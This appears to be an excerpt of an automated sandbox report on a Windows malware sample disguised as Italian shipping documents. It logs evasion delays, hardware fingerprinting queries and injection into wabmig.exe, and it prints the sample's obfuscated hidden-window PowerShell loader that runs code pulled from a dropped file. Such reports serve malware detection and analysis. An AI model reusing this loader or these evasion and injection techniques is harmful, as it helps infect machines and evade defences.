            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeAPI/Special instruction interceptor: Address: 43055C7
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeMemory allocated: 26D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeMemory allocated: 23BB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeMemory allocated: 23A40000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599344Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599235Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599110Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598985Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598860Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598744Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598625Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598403Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598254Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598091Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597969Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597859Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597746Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597605Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597480Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597359Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597246Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597141Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597016Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596891Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596764Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596653Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596544Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596438Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596328Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596216Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596110Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595883Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595766Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595656Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595547Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595437Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595328Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595219Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594891Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594766Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594641Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594532Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594407Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594282Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594172Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594063Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 593938Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 593813Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 593688Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7555Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2052Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWindow / User API: threadDelayed 3931Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWindow / User API: threadDelayed 5876Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5004Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -27670116110564310s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3448Thread sleep count: 3931 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3448Thread sleep count: 5876 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -599344s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -599235s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -599110s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -598985s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -598860s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -598744s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -598625s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -598403s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -598254s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -598091s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -597969s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -597859s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -597746s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -597605s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -597480s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -597359s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -597246s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -597141s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -597016s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -596891s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -596764s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -596653s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -596544s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -596438s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -596328s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -596216s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -596110s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -596000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -595883s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -595766s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -595656s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -595547s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -595437s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -595328s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -595219s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -595110s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -595000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -594891s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -594766s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -594641s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -594532s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -594407s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -594282s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -594172s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -594063s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -593938s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -593813s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744Thread sleep time: -593688s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeCode function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C63
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeCode function: 0_2_004068B4 FindFirstFileW,FindClose,0_2_004068B4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599344Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599235Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599110Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598985Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598860Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598744Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598625Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598403Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598254Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598091Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597969Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597859Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597746Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597605Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597480Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597359Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597246Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597141Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597016Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596891Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596764Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596653Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596544Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596438Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596328Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596216Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596110Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595883Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595766Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595656Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595547Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595437Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595328Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595219Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594891Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594766Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594641Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594532Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594407Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594282Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594172Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594063Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 593938Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 593813Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 593688Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: wabmig.exe, 00000006.00000002.2932025679.0000000008180000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wabmig.exe, 00000006.00000002.2932025679.0000000008152000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`N
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeAPI call chain: ExitProcess graph end nodegraph_0-3754
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeAPI call chain: ExitProcess graph end nodegraph_0-3905
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0097DAAC LdrInitializeThunk,LdrInitializeThunk,1_2_0097DAAC
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wabmig.exe base: 3C60000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wabmig.exe base: 26DF8D8Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)" Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeCode function: 0_2_73A91096 GetModuleFileNameW,GlobalAlloc,CharPrevW,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,FindWindowExW,lstrcmpiW,lstrcmpiW,lstrcmpiW,DeleteFileW,GetVersion,GlobalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,lstrcpyW,GetTickCount,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,GetTickCount,ReadFile,IsTextUnicode,IsDBCSLeadByteEx,MultiByteToWideChar,lstrcpyW,GlobalReAlloc,lstrcpyW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalFree,0_2_73A91096
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
